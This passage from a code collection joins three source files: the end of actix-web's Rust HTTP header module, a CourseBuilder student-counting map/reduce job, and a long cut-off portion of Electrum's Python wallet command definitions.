mod if_none_match;
mod if_range;
mod if_unmodified_since;
mod last_modified;
mod macros;
mod preference;
mod range;
#[cfg(test)]
pub(crate) use self::macros::common_header_test;
pub(crate) use self::macros::{common_header, common_header_test_module};
pub use self::{
accept::Accept,
accept_charset::AcceptCharset,
accept_encoding::AcceptEncoding,
accept_language::AcceptLanguage,
allow::Allow,
cache_control::{CacheControl, CacheDirective},
content_disposition::{ContentDisposition, DispositionParam, DispositionType},
content_language::ContentLanguage,
content_length::ContentLength,
content_range::{ContentRange, ContentRangeSpec},
content_type::ContentType,
date::Date,
encoding::Encoding,
entity::EntityTag,
etag::ETag,
expires::Expires,
if_match::IfMatch,
if_modified_since::IfModifiedSince,
if_none_match::IfNoneMatch,
if_range::IfRange,
if_unmodified_since::IfUnmodifiedSince,
last_modified::LastModified,
preference::Preference,
range::{ByteRangeSpec, Range},
};
/// Format writer ([`fmt::Write`]) for a [`BytesMut`].
#[derive(Debug, Default)]
struct Writer {
    // Growable byte buffer that accumulates all formatted output.
    buf: BytesMut,
}
impl Writer {
/// Constructs new bytes writer.
pub fn new() -> Writer {
Writer::default()
}
/// Splits bytes out of writer, leaving writer buffer empty.
pub fn take(&mut self) -> Bytes {
self.buf.split().freeze()
}
}
impl fmt::Write for Writer {
#[inline]
fn write_str(&mut self, s: &str) -> fmt::Result {
self.buf.extend_from_slice(s.as_bytes());
Ok(())
}
#[inline]
fn write_fmt(&mut self, args: fmt::Arguments<'_>) -> fmt::Result {
fmt::write(self, args)
}
} | rust | github | https://github.com/actix/actix-web | actix-web/src/http/header/mod.rs |
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Reporting of anonymized CourseBuilder usage statistics: count students."""
__author__ = [
'Michael Gainer (mgainer@google.com)',
]
from models import jobs
from models import models
from modules.usage_reporting import messaging
class StudentCounter(jobs.MapReduceJob):
    """Map/reduce job that counts the students in a course."""

    @staticmethod
    def get_description():
        """One-line description of this job for reporting purposes."""
        return 'Count number of students in course. Used for usage reporting.'

    def entity_class(self):
        """Datastore kind this job maps over."""
        return models.Student

    @staticmethod
    def map(student):
        # Emit a count of one per student under the student-count metric.
        # TODO - count: registered, unregistered, completed, certificated
        yield (messaging.Message.METRIC_STUDENT_COUNT, 1)

    @staticmethod
    def combine(unused_key, values, previously_combined_outputs=None):
        """Sum partial counts, folding in any previously combined outputs."""
        total = sum(int(value) for value in values)
        if previously_combined_outputs is not None:
            total += sum(int(value) for value in previously_combined_outputs)
        yield total

    @staticmethod
    def reduce(key, values):
        """Report the final per-metric total upstream and emit it."""
        total = sum(int(value) for value in values)
        messaging.Message.send_course_message(key, total)
        yield key, total
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import datetime
import copy
import argparse
import json
import ast
import base64
from functools import wraps
from decimal import Decimal
from typing import Optional, TYPE_CHECKING
from .import util, ecc
from .util import bfh, bh2u, format_satoshis, json_decode, json_encode, is_hash256_str, is_hex_str, to_bytes
from . import bitcoin
from .bitcoin import is_address, hash_160, COIN, TYPE_ADDRESS
from .bip32 import BIP32Node
from .i18n import _
from .transaction import Transaction, multisig_script, TxOutput
from .paymentrequest import PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .synchronizer import Notifier
from .wallet import Abstract_Wallet, create_new_wallet, restore_wallet_from_text
from .address_synchronizer import TX_HEIGHT_LOCAL
if TYPE_CHECKING:
from .network import Network
from .simple_config import SimpleConfig
known_commands = {}
def satoshis(amount):
    """Convert a decimal BTC amount to an integer number of satoshis.

    The sentinel values '!' (spend-max) and None pass through unchanged;
    satoshi conversion must not be performed by the parser.
    """
    if amount in ['!', None]:
        return amount
    return int(COIN * Decimal(amount))
class Command:
    """Descriptor for a single Electrum command.

    Built by the @command decorator from the command function and its
    requirements string; records what the command requires and the
    positional/optional parameter names extracted from the signature.
    """
    def __init__(self, func, s):
        # `s` encodes requirements: 'n' = network, 'w' = wallet,
        # 'p' = password.
        self.name = func.__name__
        self.requires_network = 'n' in s
        self.requires_wallet = 'w' in s
        self.requires_password = 'p' in s
        self.description = func.__doc__
        # First sentence of the docstring serves as the short help line.
        self.help = self.description.split('.')[0] if self.description else None
        # Positional-or-keyword argument names, excluding `self`.
        varnames = func.__code__.co_varnames[1:func.__code__.co_argcount]
        self.defaults = func.__defaults__
        if self.defaults:
            # Arguments with defaults become "options"; the rest are
            # required positional parameters.
            n = len(self.defaults)
            self.params = list(varnames[:-n])
            self.options = list(varnames[-n:])
        else:
            self.params = list(varnames)
            self.options = []
            self.defaults = []
def command(s):
    """Decorator registering a method as an Electrum command.

    's' is the requirement-flags string (see Command).  The returned
    wrapper enforces at call time that a wallet is loaded and, when the
    wallet is password-protected, that a password was supplied.
    """
    def decorator(func):
        global known_commands
        known_commands[func.__name__] = Command(func, s)
        @wraps(func)
        def func_wrapper(*args, **kwargs):
            cmd = known_commands[func.__name__]
            wallet = args[0].wallet
            if cmd.requires_wallet and wallet is None:
                raise Exception("wallet not loaded. Use 'electrum daemon load_wallet'")
            password = kwargs.get('password')
            if cmd.requires_password and password is None and wallet.has_password():
                return {'error': 'Password required' }
            return func(*args, **kwargs)
        return func_wrapper
    return decorator
class Commands:
    """Implementation of all Electrum CLI/RPC commands.

    Each method decorated with @command is exposed as a command; the
    decorator's flag string declares its requirements ('w' = wallet,
    'n' = network, 'p' = password).
    """
    def __init__(self, config: 'SimpleConfig', wallet: Abstract_Wallet,
                 network: Optional['Network'], callback=None):
        self.config = config
        self.wallet = wallet
        self.network = network
        # optional hook invoked after each command executed through _run
        self._callback = callback
    def _run(self, method, args, password_getter):
        """Execute a command by name, prompting for a password if required."""
        # this wrapper is called from the python console
        cmd = known_commands[method]
        if cmd.requires_password and self.wallet.has_password():
            password = password_getter()
            if password is None:
                # user cancelled the password prompt
                return
        else:
            password = None
        f = getattr(self, method)
        if cmd.requires_password:
            result = f(*args, **{'password':password})
        else:
            result = f(*args)
        if self._callback:
            self._callback()
        return result
    @command('')
    def commands(self):
        """List of commands"""
        return ' '.join(sorted(known_commands.keys()))
    @command('')
    def create(self, passphrase=None, password=None, encrypt_file=True, segwit=False):
        """Create a new wallet.
        If you want to be prompted for an argument, type '?' or ':' (concealed)
        """
        d = create_new_wallet(path=self.config.get_wallet_path(),
                              passphrase=passphrase,
                              password=password,
                              encrypt_file=encrypt_file,
                              segwit=segwit)
        return {
            'seed': d['seed'],
            'path': d['wallet'].storage.path,
            'msg': d['msg'],
        }
    @command('')
    def restore(self, text, passphrase=None, password=None, encrypt_file=True):
        """Restore a wallet from text. Text can be a seed phrase, a master
        public key, a master private key, a list of bitcoin addresses
        or bitcoin private keys.
        If you want to be prompted for an argument, type '?' or ':' (concealed)
        """
        d = restore_wallet_from_text(text,
                                     path=self.config.get_wallet_path(),
                                     passphrase=passphrase,
                                     password=password,
                                     encrypt_file=encrypt_file,
                                     network=self.network)
        return {
            'path': d['wallet'].storage.path,
            'msg': d['msg'],
        }
    @command('wp')
    def password(self, password=None, new_password=None):
        """Change wallet password. """
        if self.wallet.storage.is_encrypted_with_hw_device() and new_password:
            raise Exception("Can't change the password of a wallet encrypted with a hw device.")
        b = self.wallet.storage.is_encrypted()
        self.wallet.update_password(password, new_password, b)
        self.wallet.storage.write()
        return {'password':self.wallet.has_password()}
    @command('w')
    def get(self, key):
        """Return item from wallet storage"""
        return self.wallet.storage.get(key)
    @command('')
    def getconfig(self, key):
        """Return a configuration variable. """
        return self.config.get(key)
    @classmethod
    def _setconfig_normalize_value(cls, key, value):
        """Parse a setconfig value string; rpcuser/rpcpassword stay literal."""
        if key not in ('rpcuser', 'rpcpassword'):
            value = json_decode(value)
            # try to decode Python literals as well (e.g. tuples)
            try:
                value = ast.literal_eval(value)
            except:
                pass
        return value
    @command('')
    def setconfig(self, key, value):
        """Set a configuration variable. 'value' may be a string or a Python expression."""
        value = self._setconfig_normalize_value(key, value)
        self.config.set_key(key, value)
        return True
    @command('')
    def make_seed(self, nbits=132, language=None, segwit=False):
        """Create a seed"""
        from .mnemonic import Mnemonic
        t = 'segwit' if segwit else 'standard'
        s = Mnemonic(language).make_seed(t, nbits)
        return s
    @command('n')
    def getaddresshistory(self, address):
        """Return the transaction history of any address. Note: This is a
        walletless server query, results are not checked by SPV.
        """
        sh = bitcoin.address_to_scripthash(address)
        return self.network.run_from_another_thread(self.network.get_history_for_scripthash(sh))
    @command('w')
    def listunspent(self):
        """List unspent outputs. Returns the list of unspent transaction
        outputs in your wallet."""
        # deepcopy so in-place value formatting does not mutate wallet state
        l = copy.deepcopy(self.wallet.get_utxos())
        for i in l:
            v = i["value"]
            i["value"] = str(Decimal(v)/COIN) if v is not None else None
        return l
    @command('n')
    def getaddressunspent(self, address):
        """Returns the UTXO list of any address. Note: This
        is a walletless server query, results are not checked by SPV.
        """
        sh = bitcoin.address_to_scripthash(address)
        return self.network.run_from_another_thread(self.network.listunspent_for_scripthash(sh))
    @command('')
    def serialize(self, jsontx):
        """Create a transaction from json inputs.
        Inputs must have a redeemPubkey.
        Outputs must be a list of {'address':address, 'value':satoshi_amount}.
        """
        keypairs = {}
        inputs = jsontx.get('inputs')
        outputs = jsontx.get('outputs')
        locktime = jsontx.get('lockTime', 0)
        for txin in inputs:
            if txin.get('output'):
                prevout_hash, prevout_n = txin['output'].split(':')
                txin['prevout_n'] = int(prevout_n)
                txin['prevout_hash'] = prevout_hash
            # inputs carrying a bare private key are signed below
            sec = txin.get('privkey')
            if sec:
                txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
                pubkey = ecc.ECPrivkey(privkey).get_public_key_hex(compressed=compressed)
                keypairs[pubkey] = privkey, compressed
                txin['type'] = txin_type
                txin['x_pubkeys'] = [pubkey]
                txin['signatures'] = [None]
                txin['num_sig'] = 1
        outputs = [TxOutput(TYPE_ADDRESS, x['address'], int(x['value'])) for x in outputs]
        tx = Transaction.from_io(inputs, outputs, locktime=locktime)
        tx.sign(keypairs)
        return tx.as_dict()
    @command('wp')
    def signtransaction(self, tx, privkey=None, password=None):
        """Sign a transaction. The wallet keys will be used unless a private key is provided."""
        tx = Transaction(tx)
        if privkey:
            txin_type, privkey2, compressed = bitcoin.deserialize_privkey(privkey)
            pubkey_bytes = ecc.ECPrivkey(privkey2).get_public_key_bytes(compressed=compressed)
            h160 = bitcoin.hash_160(pubkey_bytes)
            # 'fd'-prefixed x_pubkey embedding the key's hash160; this is the
            # address-style form consumed by tx.sign below
            x_pubkey = 'fd' + bh2u(b'\x00' + h160)
            tx.sign({x_pubkey:(privkey2, compressed)})
        else:
            self.wallet.sign_transaction(tx, password)
        return tx.as_dict()
    @command('')
    def deserialize(self, tx):
        """Deserialize a serialized transaction"""
        tx = Transaction(tx)
        return tx.deserialize(force_full_parse=True)
    @command('n')
    def broadcast(self, tx):
        """Broadcast a transaction to the network. """
        tx = Transaction(tx)
        self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
        return tx.txid()
    @command('')
    def createmultisig(self, num, pubkeys):
        """Create multisig address"""
        assert isinstance(pubkeys, list), (type(num), type(pubkeys))
        redeem_script = multisig_script(pubkeys, num)
        address = bitcoin.hash160_to_p2sh(hash_160(bfh(redeem_script)))
        return {'address':address, 'redeemScript':redeem_script}
    @command('w')
    def freeze(self, address):
        """Freeze address. Freeze the funds at one of your wallet\'s addresses"""
        return self.wallet.set_frozen_state_of_addresses([address], True)
    @command('w')
    def unfreeze(self, address):
        """Unfreeze address. Unfreeze the funds at one of your wallet\'s address"""
        return self.wallet.set_frozen_state_of_addresses([address], False)
    @command('wp')
    def getprivatekeys(self, address, password=None):
        """Get private keys of addresses. You may pass a single wallet address, or a list of wallet addresses."""
        if isinstance(address, str):
            address = address.strip()
        if is_address(address):
            return self.wallet.export_private_key(address, password)[0]
        # not a single address: treat the argument as an iterable of addresses
        domain = address
        return [self.wallet.export_private_key(address, password)[0] for address in domain]
    @command('w')
    def ismine(self, address):
        """Check if address is in wallet. Return true if and only address is in wallet"""
        return self.wallet.is_mine(address)
    @command('')
    def dumpprivkeys(self):
        """Deprecated."""
        return "This command is deprecated. Use a pipe instead: 'electrum listaddresses | electrum getprivatekeys - '"
    @command('')
    def validateaddress(self, address):
        """Check that an address is valid. """
        return is_address(address)
    @command('w')
    def getpubkeys(self, address):
        """Return the public keys for a wallet address. """
        return self.wallet.get_public_keys(address)
    @command('w')
    def getbalance(self):
        """Return the balance of your wallet. """
        c, u, x = self.wallet.get_balance()
        out = {"confirmed": str(Decimal(c)/COIN)}
        if u:
            out["unconfirmed"] = str(Decimal(u)/COIN)
        if x:
            out["unmatured"] = str(Decimal(x)/COIN)
        return out
    @command('n')
    def getaddressbalance(self, address):
        """Return the balance of any address. Note: This is a walletless
        server query, results are not checked by SPV.
        """
        sh = bitcoin.address_to_scripthash(address)
        out = self.network.run_from_another_thread(self.network.get_balance_for_scripthash(sh))
        out["confirmed"] = str(Decimal(out["confirmed"])/COIN)
        out["unconfirmed"] = str(Decimal(out["unconfirmed"])/COIN)
        return out
    @command('n')
    def getmerkle(self, txid, height):
        """Get Merkle branch of a transaction included in a block. Electrum
        uses this to verify transactions (Simple Payment Verification)."""
        return self.network.run_from_another_thread(self.network.get_merkle_for_transaction(txid, int(height)))
    @command('n')
    def getservers(self):
        """Return the list of available servers"""
        return self.network.get_servers()
    @command('')
    def version(self):
        """Return the version of Electrum."""
        from .version import ELECTRUM_VERSION
        return ELECTRUM_VERSION
    @command('w')
    def getmpk(self):
        """Get master public key. Return your wallet\'s master public key"""
        return self.wallet.get_master_public_key()
    @command('wp')
    def getmasterprivate(self, password=None):
        """Get master private key. Return your wallet\'s master private key"""
        return str(self.wallet.keystore.get_master_private_key(password))
    @command('')
    def convert_xkey(self, xkey, xtype):
        """Convert xtype of a master key. e.g. xpub -> ypub"""
        try:
            node = BIP32Node.from_xkey(xkey)
        except:
            raise Exception('xkey should be a master public/private key')
        return node._replace(xtype=xtype).to_xkey()
    @command('wp')
    def getseed(self, password=None):
        """Get seed phrase. Print the generation seed of your wallet."""
        s = self.wallet.get_seed(password)
        return s
    @command('wp')
    def importprivkey(self, privkey, password=None):
        """Import a private key."""
        if not self.wallet.can_import_privkey():
            return "Error: This type of wallet cannot import private keys. Try to create a new wallet with that key."
        try:
            addr = self.wallet.import_private_key(privkey, password)
            out = "Keypair imported: " + addr
        except Exception as e:
            out = "Error: " + repr(e)
        return out
    def _resolver(self, x):
        """Resolve a contact/alias to an address.

        Raises when the entry is an unvalidated OpenAlias and self.nocheck
        is False (self.nocheck is set by the calling command).
        """
        if x is None:
            return None
        out = self.wallet.contacts.resolve(x)
        if out.get('type') == 'openalias' and self.nocheck is False and out.get('validated') is False:
            raise Exception('cannot verify alias', x)
        return out['address']
    @command('n')
    def sweep(self, privkey, destination, fee=None, nocheck=False, imax=100):
        """Sweep private keys. Returns a transaction that spends UTXOs from
        privkey to a destination address. The transaction is not
        broadcasted."""
        from .wallet import sweep
        tx_fee = satoshis(fee)
        privkeys = privkey.split()
        self.nocheck = nocheck
        #dest = self._resolver(destination)
        tx = sweep(privkeys, self.network, self.config, destination, tx_fee, imax)
        return tx.as_dict() if tx else None
    @command('wp')
    def signmessage(self, address, message, password=None):
        """Sign a message with a key. Use quotes if your message contains
        whitespaces"""
        sig = self.wallet.sign_message(address, message, password)
        return base64.b64encode(sig).decode('ascii')
    @command('')
    def verifymessage(self, address, signature, message):
        """Verify a signature."""
        sig = base64.b64decode(signature)
        message = util.to_bytes(message)
        return ecc.verify_message_with_address(address, sig, message)
    def _mktx(self, outputs, fee, change_addr, domain, nocheck, unsigned, rbf, password, locktime=None):
        """Build (and unless 'unsigned', sign) a transaction paying 'outputs'.

        'outputs' is a list of (address-or-alias, BTC amount) pairs;
        'domain' restricts which wallet addresses may be spent from.
        """
        self.nocheck = nocheck
        change_addr = self._resolver(change_addr)
        domain = None if domain is None else map(self._resolver, domain)
        final_outputs = []
        for address, amount in outputs:
            address = self._resolver(address)
            amount = satoshis(amount)
            final_outputs.append(TxOutput(TYPE_ADDRESS, address, amount))
        coins = self.wallet.get_spendable_coins(domain, self.config)
        tx = self.wallet.make_unsigned_transaction(coins, final_outputs, self.config, fee, change_addr)
        if locktime != None:
            tx.locktime = locktime
        if rbf is None:
            # fall back to the user's configured RBF preference
            rbf = self.config.get('use_rbf', True)
        if rbf:
            tx.set_rbf(True)
        if not unsigned:
            self.wallet.sign_transaction(tx, password)
        return tx
    @command('wp')
    def payto(self, destination, amount, fee=None, from_addr=None, change_addr=None, nocheck=False, unsigned=False, rbf=None, password=None, locktime=None):
        """Create a transaction. """
        tx_fee = satoshis(fee)
        domain = from_addr.split(',') if from_addr else None
        tx = self._mktx([(destination, amount)], tx_fee, change_addr, domain, nocheck, unsigned, rbf, password, locktime)
        return tx.as_dict()
    @command('wp')
    def paytomany(self, outputs, fee=None, from_addr=None, change_addr=None, nocheck=False, unsigned=False, rbf=None, password=None, locktime=None):
        """Create a multi-output transaction. """
        tx_fee = satoshis(fee)
        domain = from_addr.split(',') if from_addr else None
        tx = self._mktx(outputs, tx_fee, change_addr, domain, nocheck, unsigned, rbf, password, locktime)
        return tx.as_dict()
    @command('w')
    def history(self, year=None, show_addresses=False, show_fiat=False, show_fees=False,
                from_height=None, to_height=None):
        """Wallet history. Returns the transaction history of your wallet."""
        kwargs = {
            'show_addresses': show_addresses,
            'show_fees': show_fees,
            'from_height': from_height,
            'to_height': to_height,
        }
        if year:
            import time
            start_date = datetime.datetime(year, 1, 1)
            end_date = datetime.datetime(year+1, 1, 1)
            kwargs['from_timestamp'] = time.mktime(start_date.timetuple())
            kwargs['to_timestamp'] = time.mktime(end_date.timetuple())
        if show_fiat:
            from .exchange_rate import FxThread
            fx = FxThread(self.config, None)
            kwargs['fx'] = fx
        return json_encode(self.wallet.get_full_history(**kwargs))
    @command('w')
    def setlabel(self, key, label):
        """Assign a label to an item. Item may be a bitcoin address or a
        transaction ID"""
        self.wallet.set_label(key, label)
    @command('w')
    def listcontacts(self):
        """Show your list of contacts"""
        return self.wallet.contacts
    @command('w')
    def getalias(self, key):
        """Retrieve alias. Lookup in your list of contacts, and for an OpenAlias DNS record."""
        return self.wallet.contacts.resolve(key)
    @command('w')
    def searchcontacts(self, query):
        """Search through contacts, return matching entries. """
        results = {}
        for key, value in self.wallet.contacts.items():
            if query.lower() in key.lower():
                results[key] = value
        return results
    @command('w')
    def listaddresses(self, receiving=False, change=False, labels=False, frozen=False, unused=False, funded=False, balance=False):
        """List wallet addresses. Returns the list of all addresses in your wallet. Use optional arguments to filter the results."""
        out = []
        for addr in self.wallet.get_addresses():
            if frozen and not self.wallet.is_frozen_address(addr):
                continue
            if receiving and self.wallet.is_change(addr):
                continue
            if change and not self.wallet.is_change(addr):
                continue
            if unused and self.wallet.is_used(addr):
                continue
            if funded and self.wallet.is_empty(addr):
                continue
            item = addr
            # with -l/-b the entry becomes a tuple of (addr, [balance], [label])
            if labels or balance:
                item = (item,)
            if balance:
                item += (format_satoshis(sum(self.wallet.get_addr_balance(addr))),)
            if labels:
                item += (repr(self.wallet.labels.get(addr, '')),)
            out.append(item)
        return out
    @command('n')
    def gettransaction(self, txid):
        """Retrieve a transaction. """
        tx = None
        if self.wallet:
            tx = self.wallet.db.get_transaction(txid)
        if tx is None:
            # not in the wallet: fall back to querying the server
            raw = self.network.run_from_another_thread(self.network.get_transaction(txid))
            if raw:
                tx = Transaction(raw)
            else:
                raise Exception("Unknown transaction")
        return tx.as_dict()
    @command('')
    def encrypt(self, pubkey, message) -> str:
        """Encrypt a message with a public key. Use quotes if the message contains whitespaces."""
        if not is_hex_str(pubkey):
            raise Exception(f"pubkey must be a hex string instead of {repr(pubkey)}")
        try:
            message = to_bytes(message)
        except TypeError:
            raise Exception(f"message must be a string-like object instead of {repr(message)}")
        public_key = ecc.ECPubkey(bfh(pubkey))
        encrypted = public_key.encrypt_message(message)
        return encrypted.decode('utf-8')
    @command('wp')
    def decrypt(self, pubkey, encrypted, password=None) -> str:
        """Decrypt a message encrypted with a public key."""
        if not is_hex_str(pubkey):
            raise Exception(f"pubkey must be a hex string instead of {repr(pubkey)}")
        if not isinstance(encrypted, (str, bytes, bytearray)):
            raise Exception(f"encrypted must be a string-like object instead of {repr(encrypted)}")
        decrypted = self.wallet.decrypt_message(pubkey, encrypted, password)
        return decrypted.decode('utf-8')
    def _format_request(self, out):
        """Format a payment-request dict in place for display (BTC amount,
        human-readable status) and return it."""
        pr_str = {
            PR_UNKNOWN: 'Unknown',
            PR_UNPAID: 'Pending',
            PR_PAID: 'Paid',
            PR_EXPIRED: 'Expired',
        }
        out['amount (BTC)'] = format_satoshis(out.get('amount'))
        out['status'] = pr_str[out.get('status', PR_UNKNOWN)]
        return out
    @command('w')
    def getrequest(self, key):
        """Return a payment request"""
        r = self.wallet.get_payment_request(key, self.config)
        if not r:
            raise Exception("Request not found")
        return self._format_request(r)
    #@command('w')
    #def ackrequest(self, serialized):
    #    """<Not implemented>"""
    #    pass
    @command('w')
    def listrequests(self, pending=False, expired=False, paid=False):
        """List the payment requests you made."""
        out = self.wallet.get_sorted_requests(self.config)
        if pending:
            f = PR_UNPAID
        elif expired:
            f = PR_EXPIRED
        elif paid:
            f = PR_PAID
        else:
            f = None
        if f is not None:
            out = list(filter(lambda x: x.get('status')==f, out))
        return list(map(self._format_request, out))
    @command('w')
    def createnewaddress(self):
        """Create a new receiving address, beyond the gap limit of the wallet"""
        return self.wallet.create_new_address(False)
    @command('w')
    def getunusedaddress(self):
        """Returns the first unused address of the wallet, or None if all addresses are used.
        An address is considered as used if it has received a transaction, or if it is used in a payment request."""
        return self.wallet.get_unused_address()
    @command('w')
    def addrequest(self, amount, memo='', expiration=None, force=False):
        """Create a payment request, using the first unused address of the wallet.
        The address will be considered as used after this operation.
        If no payment is received, the address will be considered as unused if the payment request is deleted from the wallet."""
        addr = self.wallet.get_unused_address()
        if addr is None:
            if force:
                addr = self.wallet.create_new_address(False)
            else:
                return False
        amount = satoshis(amount)
        expiration = int(expiration) if expiration else None
        req = self.wallet.make_payment_request(addr, amount, memo, expiration)
        self.wallet.add_payment_request(req, self.config)
        out = self.wallet.get_payment_request(addr, self.config)
        return self._format_request(out)
    @command('w')
    def addtransaction(self, tx):
        """ Add a transaction to the wallet history """
        tx = Transaction(tx)
        if not self.wallet.add_transaction(tx.txid(), tx):
            return False
        self.wallet.storage.write()
        return tx.txid()
    @command('wp')
    def signrequest(self, address, password=None):
        "Sign payment request with an OpenAlias"
        alias = self.config.get('alias')
        if not alias:
            raise Exception('No alias in your configuration')
        alias_addr = self.wallet.contacts.resolve(alias)['address']
        self.wallet.sign_payment_request(address, alias, alias_addr, password)
    @command('w')
    def rmrequest(self, address):
        """Remove a payment request"""
        return self.wallet.remove_payment_request(address, self.config)
    @command('w')
    def clearrequests(self):
        """Remove all payment requests"""
        for k in list(self.wallet.receive_requests.keys()):
            self.wallet.remove_payment_request(k, self.config)
    @command('n')
    def notify(self, address: str, URL: str):
        """Watch an address. Every time the address changes, a http POST is sent to the URL."""
        # lazily create a single shared Notifier on first use
        if not hasattr(self, "_notifier"):
            self._notifier = Notifier(self.network)
        self.network.run_from_another_thread(self._notifier.start_watching_queue.put((address, URL)))
        return True
    @command('wn')
    def is_synchronized(self):
        """ return wallet synchronization status """
        return self.wallet.is_up_to_date()
    @command('n')
    def getfeerate(self, fee_method=None, fee_level=None):
        """Return current suggested fee rate (in sat/kvByte), according to config
        settings or supplied parameters.
        """
        if fee_method is None:
            dyn, mempool = None, None
        elif fee_method.lower() == 'static':
            dyn, mempool = False, False
        elif fee_method.lower() == 'eta':
            dyn, mempool = True, False
        elif fee_method.lower() == 'mempool':
            dyn, mempool = True, True
        else:
            raise Exception('Invalid fee estimation method: {}'.format(fee_method))
        if fee_level is not None:
            fee_level = Decimal(fee_level)
        return self.config.fee_per_kb(dyn=dyn, mempool=mempool, fee_level=fee_level)
    @command('w')
    def removelocaltx(self, txid):
        """Remove a 'local' transaction from the wallet, and its dependent
        transactions.
        """
        if not is_hash256_str(txid):
            raise Exception(f"{repr(txid)} is not a txid")
        height = self.wallet.get_tx_height(txid).height
        to_delete = {txid}
        if height != TX_HEIGHT_LOCAL:
            raise Exception(f'Only local transactions can be removed. '
                            f'This tx has height: {height} != {TX_HEIGHT_LOCAL}')
        to_delete |= self.wallet.get_depending_transactions(txid)
        for tx_hash in to_delete:
            self.wallet.remove_transaction(tx_hash)
        self.wallet.storage.write()
    @command('wn')
    def get_tx_status(self, txid):
        """Returns some information regarding the tx. For now, only confirmations.
        The transaction must be related to the wallet.
        """
        if not is_hash256_str(txid):
            raise Exception(f"{repr(txid)} is not a txid")
        if not self.wallet.db.get_transaction(txid):
            raise Exception("Transaction not in wallet.")
        return {
            "confirmations": self.wallet.get_tx_height(txid).conf,
        }
    @command('')
    def help(self):
        # for the python console
        return sorted(known_commands.keys())
def eval_bool(x: str) -> bool:
    """Interpret a command-line string as a boolean.

    'true'/'false' are handled explicitly; anything else is parsed with
    ast.literal_eval and coerced with bool(), falling back to the
    truthiness of the raw string when it is not a valid Python literal.
    """
    if x == 'false': return False
    if x == 'true': return True
    try:
        return bool(ast.literal_eval(x))
    except Exception:
        # Not a Python literal (e.g. a bare word): fall back to truthiness.
        # Catch Exception rather than using a bare except so that
        # SystemExit/KeyboardInterrupt are not swallowed.
        return bool(x)
# Help text for positional command arguments, keyed by parameter name;
# used by get_parser() when registering each command's params.
param_descriptions = {
    'privkey': 'Private key. Type \'?\' to get a prompt.',
    'destination': 'Bitcoin address, contact or alias',
    'address': 'Bitcoin address',
    'seed': 'Seed phrase',
    'txid': 'Transaction ID',
    'pos': 'Position',
    'height': 'Block height',
    'tx': 'Serialized transaction (hexadecimal)',
    'key': 'Variable name',
    'pubkey': 'Public key',
    'message': 'Clear text message. Use quotes if it contains spaces.',
    'encrypted': 'Encrypted message',
    'amount': 'Amount to be sent (in BTC). Type \'!\' to send the maximum available.',
    'requested_amount': 'Requested amount (in BTC).',
    'outputs': 'list of ["address", amount]',
    'redeem_script': 'redeem script (hexadecimal)',
}
# Optional (defaulted) command arguments: name -> (short flag or None, help
# text); used by get_parser() to build each command's option flags.
command_options = {
    'password':    ("-W", "Password"),
    'new_password':(None, "New Password"),
    'encrypt_file':(None, "Whether the file on disk should be encrypted with the provided password"),
    'receiving':   (None, "Show only receiving addresses"),
    'change':      (None, "Show only change addresses"),
    'frozen':      (None, "Show only frozen addresses"),
    'unused':      (None, "Show only unused addresses"),
    'funded':      (None, "Show only funded addresses"),
    'balance':     ("-b", "Show the balances of listed addresses"),
    'labels':      ("-l", "Show the labels of listed addresses"),
    'nocheck':     (None, "Do not verify aliases"),
    'imax':        (None, "Maximum number of inputs"),
    'fee':         ("-f", "Transaction fee (in BTC)"),
    'from_addr':   ("-F", "Source address (must be a wallet address; use sweep to spend from non-wallet address)."),
    'change_addr': ("-c", "Change address. Default is a spare address, or the source address if it's not in the wallet"),
    'nbits':       (None, "Number of bits of entropy"),
    'segwit':      (None, "Create segwit seed"),
    'language':    ("-L", "Default language for wordlist"),
    'passphrase':  (None, "Seed extension"),
    'privkey':     (None, "Private key. Set to '?' to get a prompt."),
    'unsigned':    ("-u", "Do not sign transaction"),
    'rbf':         (None, "Replace-by-fee transaction"),
    'locktime':    (None, "Set locktime block number"),
    'domain':      ("-D", "List of addresses"),
    'memo':        ("-m", "Description of the request"),
    'expiration':  (None, "Time in seconds"),
    'timeout':     (None, "Timeout in seconds"),
    'force':       (None, "Create new address beyond gap limit, if no more addresses are available."),
    'pending':     (None, "Show only pending requests."),
    'expired':     (None, "Show only expired requests."),
    'paid':        (None, "Show only paid requests."),
    'show_addresses': (None, "Show input and output addresses"),
    'show_fiat':   (None, "Show fiat value of transactions"),
    'show_fees':   (None, "Show miner fees paid by transactions"),
    'year':        (None, "Show history for a given year"),
    'fee_method':  (None, "Fee estimation method to use"),
    'fee_level':   (None, "Float between 0.0 and 1.0, representing fee slider position"),
    'from_height': (None, "Only show transactions that confirmed after given block height"),
    'to_height':   (None, "Only show transactions that confirmed before given block height"),
}
# don't use floats because of rounding errors
from .transaction import tx_from_str
# JSON parser that keeps fractional numbers as Decimal-backed strings,
# avoiding float rounding errors.
json_loads = lambda x: json.loads(x, parse_float=lambda x: str(Decimal(x)))
